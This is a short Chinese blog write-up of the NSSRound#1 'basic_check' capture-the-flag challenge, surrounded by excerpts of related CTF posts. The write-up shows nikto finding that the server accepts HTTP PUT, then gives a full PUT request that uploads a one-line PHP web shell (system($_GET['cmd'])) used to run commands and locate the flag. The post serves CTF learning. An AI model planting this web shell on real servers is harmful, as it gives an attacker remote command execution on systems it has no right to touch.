[NSSRound#1 Basic]basic_check

最新推荐文章于 2024-09-11 00:04:15 发布
最新推荐文章于 2024-09-11 00:04:15 发布
阅读量192 收藏
点赞数
文章标签: php 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70819573/article/details/129365665
版权
文章描述了一种通过nikto扫描工具发现的Web安全漏洞,允许使用PUT方法上传a.php文件,该文件包含一个PHP后门,可执行用户输入的系统命令。攻击者通过访问a.php并输入特定指令来寻找flag。
摘要由CSDN通过智能技术生成

1.打开环境,毫无头绪。

扫后门,.git啥都没有,看了write up才知道可以用nikto扫发现可以用PUT方法上传文件

payload:

PUT /a.php HTTP/1.1
Host: 1.14.71.254:28126
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 37



<?
system($_GET['cmd']);
?>

回显:

访问a.php输入指令找到flag.

ha0cker
关注
[NSSRound#1 Basic]cut_into_thirds
qq_51447967的博客
04-28 487
题目分析 下载得到一个raw文件,开始内存分析 题目说:flag刀成了三份,我们要把三份找到人后拼接起来得到一个UUID。 首先常规分析镜像版本。 得到镜像的版本是Win7SP1x64 然后查看进程 vol.py -f ./cut_into_thirds.raw --profile=Win7SP1x64 pslist 主要是LookAtMe.exe这个进程比较可疑 尝试把它dump出来 先利用memdump来dump出dmp格式的文件 vol.py -f ./cut_into_thirds.r
Reverse - [NSSRound#2 Able]findxenny
st1cky的博客
04-17 826
睡前才猛然想起今天NSSCTF有比赛,来不及了 (╥╯^╰╥) 用IDA反编译,找关键字符串: 查看调用找到主函数 __int64 sub_140018C10() { char *v0; // rdi signed __int64 i; // rcx __int64 v2; // rax __int64 v3; // rax __int64 v4; // rax __int64 v5; // rax __int64 v6; // rax __int64 v7; // r.
每日练习-[NSSRound#1 Basic]basic_check
m0_68113265的博客
08-27 118
的作用是发送一个OPTIONS请求到指定的URL,并在输出中显示服务器的响应头信息,以便你可以看到服务器支持的HTTP方法、允许的请求头等信息。:这个选项指定了要发送的HTTP方法,这里是OPTIONS。OPTIONS方法是一种用于询问服务器支持的HTTP方法的请求,服务器会在响应中。是一个用于漏洞扫描和安全评估的开源工具。它用于检测Web服务器上的潜在安全漏洞、配置错误以及其他与安全相关的问题。它会将服务器返回的响应头和响应体都显示出来。扫描目标主机,并生成一个详细的报告,其中包含了发现的漏洞和问题。
[NSSRound#1 Basic]basic_check题解以及对nikto的初步了解还有对PUT请求的复习
qq_75120258的博客
03-22 623
[NSSRound#1 Basic]basic_check题解以及对nikto的初步了解还有对PUT请求的复习
NSSRound#1 Basic]basic_check题解
weixin_45446164的博客
01-08 718
dirsearch也跑不出来任何东西,首先爆破路径没有办法,剩下就考虑相应的数据包有没有可疑的东西,也未发现,看到其他师傅扫出来PUT,使用了OPTIONS方法这让我想起来开发的预检请求,用于检测服务器允许的http方法,可以看到扫出来了PUT 利用到的CURL参数: -I参数:向服务器发出 HEAD 请求,然会将服务器返回的 HTTP 标头打印出来。 -x参数:指定 HTTP 请求的代理。 因为需要指定他的api接口,不能是自动指向,所以要加上index.php 再说一下PUT、DELETE请求,PUT
[NSSRound#1 Basic]
ki10Moc的博客
08-03 615
看了本文会影响您一天的好心情的
30_Step7_Basic_V10_5_Configuration_Devices_and_Networks_cn_V
03-17
30_Step7_Basic_V10_5_Configuration_Devices_and_Networks_cn_V 介绍了关于30_Step7_Basic_V10_5_Configuration_Devices_and_Networks_cn_V的详细说明,提供S7-1200的技术资料的下载。
BASIC_jieshiqi.rar_basic_basic interpreter_basic解释器_visual c_解释器
09-19
1. **词法分析**:将源代码分解成一个个称为“标记”(tokens)的最小单元,如关键字、变量名、数字等。 2. **语法解析**:根据BASIC语法规则,将标记组合成抽象语法树(AST),这有助于理解程序结构。 3. **语义...
XCP Basic Driver.zip_XCP Basic_XCP driver_asideu3k_basic driver_
07-14
XCP协议 基本驱动代码。非常实用 ,标定测量 必不可少。谢谢可参考XCP协议学习
NSSCTF Round#1 Basic [nss2022年4月3日个人赛]web的题解
weixin_51458899的博客
04-04 2519
[nss个人赛]basic_check(复现) (83条消息) Nikto安装和使用_半砖的博客-CSDN博客_nikto安装 参考:https://blog.51cto.com/dearch/2053703 单纯复现比较简单 [nssctf个人赛]sql_for_sql 站点功能是: 登录 注册 改密码 登录和注册均没有注入点 考虑改密码的时候会二次注入 结果的确发现了异常,无论是用户名一开始注册的时候加了单引号,还是新密码用了单引号,状态码会报500, 推测改密码的后台sql select p
NSSCTF-Web安全入门-wp
网安小菜鸡
01-27 4268
NSSCTF-Web安全入门-wp
nssround re复现
m0_75098930的博客
08-05 212
程序逻辑很清晰,如果有dll的话,就怎么怎么样,如果没有,就让输入什么,然后有什么操作,那首先就是恢复dll,直接运该程序,会生成一个dll,但是肯定不是dll的格式,跟进一下,发现是用输入的秘钥,然后tea加密一次,生成一个秘钥,用该秘钥与abab异或,所以只要找到秘钥流就行,而且这个abab看起来就像一个pe格式,那直接和正常的pe格式异或一下,秘钥流就出来了(首先我们跟进程序,发现秘钥流有10位)这道题确实不会做,看了看网上师傅们的做法,有个师傅用ce修改轮数,唉,完全没想到,师傅tql。
NSSCTF Round#12 Basic—Bulbasaur
Aluxian_的博客
05-22 868
NSSRound#12 Basic MISC复现
PHP智驭未来悦享生活智慧小区物业管理小程序系统源码
2401_84413757的博客
09-10 616
它集成了多项实用功能,无论是业主还是物业管理人员,都能通过简单的一键操作,轻松实现小区的日常管理。无论是清晨的晨跑,还是夜晚的归家,都不再需要为这些琐事烦恼,真正实现了“智驭未来,悦享生活”。无论是分享生活的点滴,还是参与社区的各类活动,都能让业主们感受到家的温暖和归属感。而今天,我要带大家走进的,正是这股智慧浪潮中的一股清流——“智驭未来悦享生活”智慧小区物业管理小程序。“智驭未来悦享生活”智慧小区物业管理小程序的出现,不仅为小区管理带来了革命性的变革,更为我们描绘了一幅未来生活的美好蓝图。
一码空传临时网盘PHP源码,支持提取码功能
最新发布
爱酷码的博客
09-11 285
一码空传临时网盘源码V2.0免费授权,该源码提供了一个简单易用的无数据库版临时网盘解决方案。前端采用了layui开发框架,后端使用原生PHP编写,没有引入任何开发框架,保持了代码的简洁和高效。这个程序使用了一个无数据库配置读写类,并借鉴了网络上的config文件读写代码。用户可以通过提取码来提取文件,无需上传文件到服务器。该程序还配备了一个后台管理系统,而且不需要数据库支持。用户上传的文件会保存在upload文件夹中,并按照md5算法进行加密和重命名,确保每次加密结果都不相同。
[极客大挑战 2019]Http
2201_75556700的博客
09-10 461
3、访问Secret.php发现页面有提示,它说它不是来自这个网页。6、添加X-Forwarded-For: 127.0.0.1。5、修改User-Agent为:Syclover。2、查看页面源码发现一个。
以太坊开发环境
禅与代码的艺术
09-07 1432
详细讨论了以太坊测试网络和私有网络。在初步介绍了私有网络设置之后,演示了如何使用 Geth 命令行工具执行各种功能,以及如何与以太坊区块链进行交互。还讨论了如何使用 Mist 来部署合约和发送交易。
#define BSP_BUTTON_0 BUTTON_1
09-03
在这个上下文中,`BSP`可能是"Basic System Platform"(基本系统平台)的缩写,表示这是一个特定板级支持包(BSP)中的约定。这里可能假设`BUTTON_0`在BSP的标准配置下实际上就是`BUTTON_1`。通过这样的定义,开发者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值